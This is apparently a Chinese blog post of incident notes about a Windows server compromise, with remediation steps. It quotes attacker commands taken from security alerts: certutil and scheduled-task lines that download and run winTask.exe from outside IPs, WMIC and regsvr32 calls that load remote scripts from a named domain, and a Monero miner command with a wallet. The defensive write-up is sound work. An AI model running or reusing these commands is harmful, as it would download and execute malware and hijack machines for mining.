一次应用入侵
服务器报警
命令行: cmd.exe /c "certutil.exe -urlcache -split -f http://146.196.83.217:29324/winTask.exe C:WindowsTempwinTask.exe"
命令行: C:\Windows\System32\Wbem\wmic.EXE os get /format:"http://sec.dashabi.in/javaw2/net/net.xsl"
进程路径: C:/Windows/System32/wbem/WMIC.exe
进程ID: 8544
父进程命令行: taskeng.exe {91BBC158-F18D-4E4A-8D69-117DF5612003} S-1-5-18:NT AUTHORITY\System:Service:
命令行: schtasks /create /tn SystemProcessDebug /tr "certutil.exe -urlcache -split -f http://118.190.211.34:82/image/png/winTask.exe C:\Window\Temp\winTask.exe & C:\Windows\Temp\winTask.exe" /sc daily
进程PID: 10736
进程文件名: schtasks.exe
c:/windows/temp/core/core.exe
命令行参数: C:\Windows\Temp\core\core.exe --coin monero -o xmr.f2pool.com:13531 -u 46YngqQEZQ6HYhqP7noesGdoecXZRM2jR16t7RKTbhW4TtqdKUQyggs3x7pADEWvpr5ySbesyQQwJfaHbewXurEWNdeWNtj.gtest -p x -k -B --donate-level=1 --cpu-max-threads-hint=70
类型: Task Scheduler(计划任务)
路径: \Microsoft\Windows\MUI\LMRemover
内容: regsvr32 /u /s /i:http://sec.dashabi.in/javaw2/instance.xsl scrobj.dll
事件说明: 检测模型发现您服务器上的某些自启动项可疑,可能是恶意软件或者黑客在入侵后进行的持久化痕迹。
这个没看明白 https://www.cnblogs.com/backlion/p/10489521.html
将ip 加入黑名单,将域名加到hosts中指向127.0.0.1
?将schtasks.exe 文件改为非admin可执行 需要trustedinstaller提供的权限
==>
新建管理员用户,登录,对该文件 属性--安全--所有者--编辑换成当前用户 然后再更改权限
?删除定时任务
chcp 437
schtasks /query /fo LIST /v |findstr http
【推荐】还在用 ECharts 开发大屏?试试这款永久免费的开源 BI 工具!
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· AI与.NET技术实操系列:使用Catalyst进行自然语言处理
· 分享一个我遇到过的“量子力学”级别的BUG。
· Linux系列:如何调试 malloc 的底层源码
· AI与.NET技术实操系列:基于图像分类模型对图像进行分类
· go语言实现终端里的倒计时
· 历时 8 年,我冲上开源榜前 8 了!
· 物流快递公司核心技术能力-海量大数据处理技术
· 四大AI编程工具组合测评
· 关于能否用DeepSeek做危险的事情,DeepSeek本身给出了答案
· 如何在 Github 上获得 1000 star?